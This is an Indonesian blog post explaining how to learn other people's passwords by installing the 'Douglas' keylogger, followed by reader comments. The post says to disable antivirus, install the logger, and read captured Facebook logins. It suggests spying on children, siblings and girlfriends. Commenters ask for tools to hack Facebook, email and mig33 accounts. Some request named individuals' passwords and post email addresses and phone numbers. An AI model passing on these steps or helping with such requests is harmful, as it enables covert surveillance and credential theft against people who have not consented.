Latest News

Blogroll

Menu :

World News

Recent post

Free Download Software Full Version

Random Post

Recent news

Software/Game/Android/Antivirus/Tips & Trik

Template Updates

Template Information

Decoration

Cara mengetahui katasandi passwoard orang lain

Category: , , Written by Master Datz / 00.34
LINK DOWNLOAD Cara mengetahui katasandi passwoard orang lain SUDAH DI PERBAIKI  feb 2013 ^_^

Cara mengetahui katasandi passwoard orang lain dengan menggunakan keyloggerdouglas_en..
Software ini kusus merekam katasandi/passwoard aktivitas keyboard..
Yang ingin coba silahkan,,

Tutorialnya sbb:
Pertama matikan semua antivirus dan download keylogger douglas Click ini
lalu extrack here dengan winrar,,
contoh gambar di bawah:
Buka folder yang di extrack,,
click kanan pada file instal dan open,,
instal seperti biasa dan masukan passwoard apa aja..
selesai instal coba sobat buka www.facebook.com maka apa yang di ketik keyboard akan terekam oleh keylogger ini,, dan keluar dari fb..
maka email dan katasandi yang sobat ketikan terrekam oleh software ini..
Lalu cari folder yang di extrack tadi,, click 2 kali pada readinfo dan masukan passwoard tadi lalu ok..
Lihat di bawah di samping start (C:\WINDO... click (C:\WINDO... Lihat paswooardnya dan tinggal copas (copy paste) selesai..

Inilah Cara mengetahui katasandi passwoard orang lain
Jangan salah di pergunakan,, keylogger douglas ini cocok untuk mengawasi anak,, adik dan pacar sobat..

Download software hack facebook

Thank for sharing!

About The Author


Templateify

Praesent nec tortor quam. Quisque ac malesuada augue. Sed dignissim gravida odio ut bibendum. Cras fermentum euismod turpis. Nunc nec diam ante, et faucibus ipsum. Etiam imperdiet mattis elit et molestie. Nulla feugiat mollis leo vel egestas. Pellentesque convallis

31 komentar:

  1. terime kasih banyak gan ane termasuk hacker pemula jadi blog ni dapat mbantu ane

    BalasHapus
  2. yupz sama2,,
    Maaf baru di blz..

    BalasHapus
  3. Gan mau tanya ni.
    Ni dipakainya kalau ada yang login pake komputer yang terinstal software ini. atau kalau kita login dengan password yang salah. apakah sandinya akan tetap terlihat.
    terimakasih.

    BalasHapus
  4. Software ini untuk merekam aktivitas keyboard,,
    jadi salah dan benar tetap terekam..

    BalasHapus
  5. Komentar ini telah dihapus oleh penulis.

    BalasHapus
  6. bos ane butuh sofware hack id mig33 punya gak bos ?? ane udah sms ke nope kayanya gak aktiv bos

    BalasHapus
  7. Nanti saya akan membantu anda,,
    tapi skrg saya lagi sibuk dgn pekerjaan..
    cara hack id mig33 ini saya tidak akan membuat postingan,,
    nanti saya send di nmor mambo..

    BalasHapus
  8. Nice inpoh ßяσ.. Btw, boleh req app hack email or FB? Kalo Ъќ keberatan tlg di kirim ke lovevagina0@gmail.com

    Many tks

    BalasHapus
  9. Balasan
    1. master datz
      sy ingin mengetahui kata sandi email ini
      email: een.aeni.90@yahoo.com
      mohon tolong minta sandinya ya:
      kalo dah ada sandinya
      kirim sandinya ke no saya...
      Ni nomor ya..0817757047

      Hapus
  10. gan tlong app bwt hach email......soalnya email bpak saya dhack orang, beliau kbngungan soalnya data2 kantor ada disitu,tlong send ksni yaa......
    loves9600@gmail.com

    BalasHapus
  11. Buat yg suka ngehack pake software ini "Pro Facebook Hack v 2.0 By Anonymous & Zmaim"
    tutorialnya cari di youtube!!

    BalasHapus
  12. gan bantu lag dong bkinin hack fb yang paten

    BalasHapus
  13. Wach kalau jarak dekat,, gunakan ini aja..

    BalasHapus
  14. omm..

    file nya kok banyak yang di hapus..

    link nya lagi donk..

    BalasHapus
  15. bos saya punya akun yang di tutup udah lama di tutup cuman pengen di bukalagi udahbanyak trik namun gagal bisa ngak bantu ngembaliin akun fb atau bisa kasih saya software jegud
    ini email nya elasaidah@yahoo.com...atau kirimi saya sofware lewat imail saya hasanwirayuda58@yahoo.com

    BalasHapus
  16. gan ane lupa pass ny....
    gimana cara nya gan supaya bisa digunakan lg
    mkasih
    abhinaya789@rocketmail.com

    BalasHapus
  17. gan tlong ksih aplikasi bwt nge hack id mig33... mkasihh,,

    BalasHapus
  18. gan link nya kok ngga bisa tulisannya Unknown network error.

    BalasHapus
  19. link nya jancookk

    BalasHapus
  20. gan cara ngumpetin red info gimana trsss kalo komputer di reset atau di restart douglas nya ilang gk

    BalasHapus
  21. master datz
    sy ingin mengetahui kata sandi email ini
    email: masdani@outlook.com
    mohon tolong minta sandinya ya:
    kalo dah ada sandinya
    kirim via sms sandinya ke no saya 085322854745

    BalasHapus
  22. keren artikelnya

    BalasHapus
  23. "Pro Facebook Hack v 2.0 ko kita kudu bayar sih gan?....

    BalasHapus
  24. bakal ketauan katasandi pacar aku,,,,,,,,,,,,,,,,,,,, mantep :-)

    BalasHapus
  25. cara mengetahui password orang lain :q
    http://www.master-datz.com/2012/04/cara-mengetahui-katasandi-passwoard.html

    BalasHapus